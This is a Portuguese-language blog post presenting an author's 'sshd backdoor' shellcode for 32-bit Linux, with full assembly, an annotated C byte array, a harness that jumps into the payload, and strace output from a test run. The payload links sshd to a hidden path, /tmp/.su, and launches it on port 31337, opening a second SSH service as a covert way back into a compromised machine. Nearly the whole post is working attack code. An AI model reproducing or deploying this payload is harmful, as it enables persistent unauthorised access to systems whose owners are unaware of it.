segunda-feira, 6 de abril de 2015

Simple sshd backdoor shellcode (Linux - X86)

Mais um shellcode, nível noob, que eu fiz. Ele cria um symlink de /usr/sbin/sshd em /tmp/.su e executa esse link com `-oPort=31337`, subindo um segundo sshd na porta 31337 (para isso o processo normalmente precisa de root, já que o sshd lê as chaves do host). Código asm:
section .text
 global _start:

_start:
	; by mmxm (@hc0d3r)
	;
	; Linux/x86 (32-bit) shellcode, NASM syntax, int 0x80 ABI:
	;   eax = syscall number, ebx/ecx/edx = args 1..3, result in eax.
	; Every string is built on the stack with dword pushes and terminated by
	; pushing a register already zeroed, so the encoded bytes contain no 0x00
	; (the C harness below carries the resulting 80 bytes).
	; NOTE(review): presumably meant to run as root - sshd needs the host keys -
	; the post does not show the privilege level it was tested with.
	;
	; Step 1: symlink("/usr/sbin/sshd", "/tmp/.su")

	xor eax, eax                ; eax = 0
	xor ebx, ebx                ; ebx = 0
	xor ecx, ecx                ; ecx = 0, reused below as a NUL terminator

	mov bx, 0x6468              ; ebx = "hd\0\0": 16-bit write keeps the encoding
	                            ; null-free (a dword immediate would embed 0x00 0x00)

	push ebx                    ; "hd\0\0"  (end of the path plus terminator)
	push 0x73732f6e             ; "n/ss"
	push 0x6962732f             ; "/sbi"
	push 0x7273752f             ; "/usr"

	mov ebx, esp                ; arg 1: target = "/usr/sbin/sshd"

	mov al, 83                  ; eax = __NR_symlink (i386)

	push ecx                    ; NUL terminator
	push 0x75732e2f             ; "/.su"
	push 0x706d742f             ; "/tmp"

	mov ecx, esp                ; arg 2: linkpath = "/tmp/.su"

	int 0x80                    ; symlink(); the return value in eax is never
	                            ; checked - e.g. if /tmp/.su already exists the
	                            ; execve below still runs against whatever is there

	; Step 2: execve("/tmp/.su", ["/tmp/.su", "-oPort=31337"], NULL)
	; ecx still points at "/tmp/.su" from step 1.

	xor eax, eax                ; eax = 0
	xor ebx, ebx                ; ebx = 0
	xor edx, edx                ; arg 3: envp = NULL (strace shows 0 vars)

	mov ebx, ecx                ; arg 1: filename = "/tmp/.su"

	push eax                    ; NUL terminator
	push 0x37333331             ; "1337"
	push 0x333d7472             ; "rt=3"
	push 0x6f506f2d             ; "-oPo"

	mov ecx, esp                ; ecx -> "-oPort=31337"

	push eax                    ; argv[2] = NULL
	push ecx                    ; argv[1] = "-oPort=31337"
	push ebx                    ; argv[0] = "/tmp/.su"

	mov ecx, esp                ; arg 2: argv

	mov al, 11                  ; eax = __NR_execve (i386)

	int 0x80                    ; does not return on success; on failure eax = -errno
	                            ; and execution falls off the end into whatever
	                            ; bytes follow the shellcode (there is no exit path)


Shellcode:
#include <stdio.h>
#include <string.h>

// shellcode by mmxm (@hc0d3r)

/*
 * The 80 bytes produced by the assembly listing above, one instruction
 * per line.  The sequence contains no 0x00 byte; the string literal
 * appends a single trailing NUL, so sizeof(shellcode) is 81 and the
 * payload length is sizeof(shellcode) - 1.
 */
unsigned const char shellcode[] =
	/* symlink("/usr/sbin/sshd", "/tmp/.su") */
	"\x31\xc0"                    /* xor  eax, eax                */
	"\x31\xdb"                    /* xor  ebx, ebx                */
	"\x31\xc9"                    /* xor  ecx, ecx                */
	"\x66\xbb\x68\x64"            /* mov  bx, 0x6468    "hd"      */
	"\x53"                        /* push ebx           "hd\0\0"  */
	"\x68\x6e\x2f\x73\x73"        /* push 0x73732f6e    "n/ss"    */
	"\x68\x2f\x73\x62\x69"        /* push 0x6962732f    "/sbi"    */
	"\x68\x2f\x75\x73\x72"        /* push 0x7273752f    "/usr"    */
	"\x89\xe3"                    /* mov  ebx, esp      target    */
	"\xb0\x53"                    /* mov  al, 83        symlink   */
	"\x51"                        /* push ecx           NUL       */
	"\x68\x2f\x2e\x73\x75"        /* push 0x75732e2f    "/.su"    */
	"\x68\x2f\x74\x6d\x70"        /* push 0x706d742f    "/tmp"    */
	"\x89\xe1"                    /* mov  ecx, esp      linkpath  */
	"\xcd\x80"                    /* int  0x80                    */
	/* execve("/tmp/.su", ["/tmp/.su", "-oPort=31337"], NULL) */
	"\x31\xc0"                    /* xor  eax, eax                */
	"\x31\xdb"                    /* xor  ebx, ebx                */
	"\x31\xd2"                    /* xor  edx, edx      envp=NULL */
	"\x89\xcb"                    /* mov  ebx, ecx      filename  */
	"\x50"                        /* push eax           NUL       */
	"\x68\x31\x33\x33\x37"        /* push 0x37333331    "1337"    */
	"\x68\x72\x74\x3d\x33"        /* push 0x333d7472    "rt=3"    */
	"\x68\x2d\x6f\x50\x6f"        /* push 0x6f506f2d    "-oPo"    */
	"\x89\xe1"                    /* mov  ecx, esp                */
	"\x50"                        /* push eax           argv[2]   */
	"\x51"                        /* push ecx           argv[1]   */
	"\x53"                        /* push ebx           argv[0]   */
	"\x89\xe1"                    /* mov  ecx, esp      argv      */
	"\xb0\x0b"                    /* mov  al, 11        execve    */
	"\xcd\x80";                   /* int  0x80                    */

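/*
 * Test harness: report the payload length, then jump into the byte array.
 * The jump only works when the page holding `shellcode` is executable;
 * the compile flags used on the tested CentOS 6.6 box are not shown in the
 * post, so confirm them (an NX-protected .rodata faults at the jmp).
 */
int main(void){
	/* sizeof counts the literal's trailing NUL, hence -1; the size is a
	 * size_t, so %zu is the matching conversion (the old %d was a
	 * type mismatch that only happened to work on 32-bit). */
	printf("Shellcode size: %zu bytes\n", sizeof(shellcode) - 1);
	/* execve() replaces the process image without flushing stdio, so make
	 * sure the size line is written even when stdout is a pipe or file. */
	fflush(stdout);
	__asm__ __volatile__("jmp shellcode");
	return 0;  /* never reached: the jmp above does not come back */
}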

Testado em CentOS 6.6 (x86, 32 bits). Observe que o symlink e o execve aparecem no strace exatamente como esperado; o retorno do symlink não é verificado pelo shellcode.
[mmxm@hc0d3r ASM]$ strace -e execve,symlink ./a.out
execve("./a.out", ["./a.out"], [/* 42 vars */]) = 0
Shellcode size: 80 bytes
symlink("/usr/sbin/sshd", "/tmp/.su")   = 0
execve("/tmp/.su", ["/tmp/.su", "-oPort=31337"], [/* 0 vars */]) = 0

Referencia: http://pastebin.com/LnSRJed1
